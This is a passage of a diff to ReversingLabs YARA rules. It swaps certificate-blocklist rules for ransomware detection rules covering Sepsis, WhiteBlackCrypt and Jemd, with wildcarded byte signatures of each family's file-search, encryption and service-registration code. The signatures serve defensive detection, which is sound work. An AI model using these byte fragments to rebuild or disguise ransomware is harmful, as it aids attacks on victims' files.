+            16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F & A.TIM d.o.o." and ( pe.signatures [ i ] . serial == "00:ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" or pe.signatures [ i ] . serial == "ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" ) and 1576195200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $aes_encrypt ) and ( $encrypt_pass )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3223B4616C2687C04865Bee8321726A8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sepsis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sepsis ransomware."
 		author = "ReversingLabs"
-		id = "089aae56-4f46-563c-800a-dbf57db2bde6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0c26d6e0-1d64-5f47-8e21-6710a531bc74"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5214-L5230"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fcb0a14866b3612c5ec5a7db7a3333e20a4605695b3d019eef84de85d7b3ea4d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sepsis.yara#L1-L126"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "171ad074a780b45195c6e02b111b3883c58a4028e635c4d6b8ce27c5e05e35d7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sepsis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files_1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 84 24 ?? ?? ?? ?? 56 57 8B 3D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF D7 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$search_files_2 = {
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ??
+            ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ??
+            50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A
+        }
+		$search_files_3 = {
+            66 8B 0A 83 C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B
+            E5 5D C2
+        }
+		$search_files_4 = {
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ??
+            ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A ?? 66 8B 0A 83
+            C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2
+        }
+		$encrypt_files_1 = {
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? FF D6 0F 10 05 ?? ?? ?? ?? 8B F8 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 0F 11 07 89 3D ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 47 ?? 0F 10 05 ??
+            ?? ?? ?? 0F 11 47 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 8D
+            45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B CF 8D 51
+        }
+		$encrypt_files_2 = {
+            8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 4D ??
+            89 4D ?? FF D3 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF D6 FF 75 ?? 8B F0 6A ?? 56 E8 ??
+            ?? ?? ?? FF 75 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? FF 75 ?? 50 56 6A ?? 6A ??
+            6A ?? FF 75 ?? FF D3 8B F8 F7 DF 1B FF 23 FE 8B 35 ?? ?? ?? ?? 8B D7 8D 4A ?? 66 90
+            8A 02 42 84 C0 75 ?? 2B D1 8B CF E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84
+            C9 75 ?? 2B C2 57 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 81 3D ?? ?? ?? ?? ?? ??
+            ?? ?? 0F 82 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_3 = {
+            55 8B EC 83 EC ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B C1 68 ?? ?? ?? ?? 50
+            89 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 0B C0 5F 8B E5 5D C3 53 6A ?? 57 FF
+            15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 8B D8 56 B8 ?? ??
+            ?? ?? 6A ?? 3B D8 0F 47 D8 53 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ??
+            75 ?? 5E 5B 0B C0 5F 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B
+            35 ?? ?? ?? ?? 89 45 ?? FF D6 57 FF D6 E8 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 05
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B F8 BE ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11
+            05 ?? ?? ?? ?? 85 DB 74
+        }
+		$encrypt_files_4 = {
+            8A 0C 06 8D 40 ?? 30 48 ?? 83 EA ?? 75 ?? 8B CF E8 ?? ?? ?? ?? 8B F7 83 C7 ?? 83 EB
+            ?? 75 ?? 8B 45 ?? 0F 10 06 50 0F 11 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B F2
+        }
+		$encrypt_files_5 = {
+            66 8B 02 83 C2 ?? 66 85 C0 75 ?? BB ?? ?? ?? ?? 2B D6 8D 7B ?? 66 8B 47 ?? 83 C7 ??
+            66 85 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? 83 C3 ?? F3 A4 66 8B 43 ?? 83 C3
+            ?? 66 85 C0 75 ?? 8B FB B9 ?? ?? ?? ?? 8B 5D ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
+            53 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 35 ?? ?? ?? ?? 6A
+            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 5E 5B 33 C0 5F 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" and 1601337600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7709D2Df39E9A4F7Db2F3Cbc29B49743 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Whiteblackcrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WhiteBlackCrypt ransomware."
 		author = "ReversingLabs"
-		id = "7227daa3-453d-5bb8-804c-8a97cd0d81c6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9855c10d-563d-54e0-bc79-945daef947de"
+		date = "2021-07-05"
+		modified = "2021-07-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5232-L5248"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c9ade45e0f9fb737a08ffa94d1fff89471a1cbcbacc139730fab88e382226d0b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.WhiteBlackCrypt.yara#L1-L91"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "37b95cc3412f2f2d02d19c4c15b529c4f67453cb195627b5bab2f353e7602354"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WhiteBlackCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            41 57 41 56 41 55 41 54 55 57 56 53 48 83 EC ?? 4C 8D 3D ?? ?? ?? ?? 45 31 F6 49 89
+            CD E8 ?? ?? ?? ?? 48 85 C0 49 89 C4 0F 84 ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85
+            C0 0F 84 ?? ?? ?? ?? 48 8D 68 ?? 4C 89 FA 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
+            15 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 44 89 F0 48 83 C9 ?? 48 89 EF F2
+            AE 4C 89 EF 48 89 CB 48 83 C9 ?? F2 AE 48 F7 D3 48 F7 D1 01 D9 48 63 D9 48 89 D9 E8
+            ?? ?? ?? ?? 48 89 D9 4C 89 EA 48 89 C6 48 89 C7 44 89 F0 F3 AA 48 89 F1 E8 ?? ?? ??
+            ?? 48 8D 15 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 48 89 EA 48 89 F1 E8 ?? ?? ?? ?? 48
+            89 F1 E8 ?? ?? ?? ?? 48 89 F1 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 89
+            F1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E1 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E
+            41 5F E9 ?? ?? ?? ?? 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$encrypt_files = {
+            41 55 41 54 55 57 56 53 48 83 EC ?? 48 8D 15 ?? ?? ?? ?? 31 F6 4C 8D 2D ?? ?? ?? ??
+            48 89 CD E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C3 E8 ?? ?? ?? ?? 48 89 C7 49 89 D9 41
+            B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 85 C0 49 89 C4 74 ?? 81 FE ??
+            ?? ?? ?? 7F ?? 45 89 E0 48 89 FA 4C 89 E9 E8 ?? ?? ?? ?? 45 31 C0 89 F2 48 89 D9 E8
+            ?? ?? ?? ?? 44 01 E6 4D 63 C4 48 89 F9 49 89 D9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 31
+            C0 89 F2 48 89 D9 E8 ?? ?? ?? ?? EB ?? 48 89 F9 48 89 EF E8 ?? ?? ?? ?? 48 89 D9 E8
+            ?? ?? ?? ?? 31 C0 48 83 C9 ?? F2 AE 48 89 CE 48 F7 D6 48 89 F1 48 83 C1 ?? E8 ?? ??
+            ?? ?? 48 89 EA 48 89 C1 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 E9 48 89 C2 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D E9
+        }
+		$register_service_p1 = {
+            57 56 53 48 81 EC ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 31 C0 41 B9 ?? ?? ?? ?? 48 8D 94
+            24 ?? ?? ?? ?? 48 89 CB B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 D7 F3 AB 48 8D
+            44 24 ?? 48 89 54 24 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48
+            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 48 8B 35 ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 41 B8 ?? ?? ?? ?? 48 89 DA FF 15
+            ?? ?? ?? ?? 48 8D 44 24 ?? 45 31 C0 41 B9 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ??
+            ?? ?? 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8D 05 ?? ?? ?? ?? 48 8B
+            4C 24 ?? 41 B9 ?? ?? ?? ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            45 31 C0 48 89 D9 FF 15 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 31 C9 FF D6 48 85 C0 79 ??
+            B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 31 C9 BA ?? ??
+            ?? ?? 48 C1 E0 ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ??
+            ?? 48 8D 35 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 48 8D
+        }
+		$register_service_p2 = {
+            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            41 B9 ?? ?? ?? ?? 48 89 F2 48 89 1D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ??
+            48 8B 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D6 B9 ?? ?? ?? ?? 48 89 C3 FF 15 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 89 D9 49 89 C0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D
+            54 24 ?? 48 89 C1 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 41 B9 ?? ??
+            ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ??
+            ?? ?? ?? ?? 48 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 99 F7 F9 2D ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 99 F7 F9 31 C9 48 8D 15 ?? ?? ??
+            ?? 2D ?? ?? ?? ?? 89 44 24 ?? FF D6 BA ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89
+            D9 FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8D 5C 24 ?? 45 31 C9 45 31 C0 31 D2 48
+            89 D9 FF D6 85 C0 74 ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? EB ??
+            8B 84 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5E 5F C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" and 1556353331 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $register_service_p* ) ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_E29690E14518874D2Dcf00234Ae94F1F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jemd : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Jemd ransomware."
 		author = "ReversingLabs"
-		id = "6b4f26d3-b943-5a2e-bfb9-0e290031926a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ef981ffa-8801-50f0-9441-5f2bfcf44133"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5250-L5268"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ef84815798b213dc49a142e3076cc6dd680dccabe72643fc86234024a46468f9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Jemd.yara#L1-L105"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "552e0fc118031e953dee2e7c6bf8234a5a90de8c34b0e2724dfe99f2b28b8c51"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Jemd"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 33 DB 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 75
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
+            45 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files_2 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ??
+            89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8D B5 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? ?? ?? 89
+            C3 BB ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4B 75 ?? 33 DB 8D 45 ?? 33 C9 BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8A 14 1E 88 54 05 ?? 40 43 80 3C 1E ?? 74 ?? 83 F8
+            ?? 7E ?? 43 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 80 7C 1E
+            ?? ?? 75 ?? 80 3C 1E ?? 74 ?? 81 FB ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 33 C0 5A 59 59 64
+            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
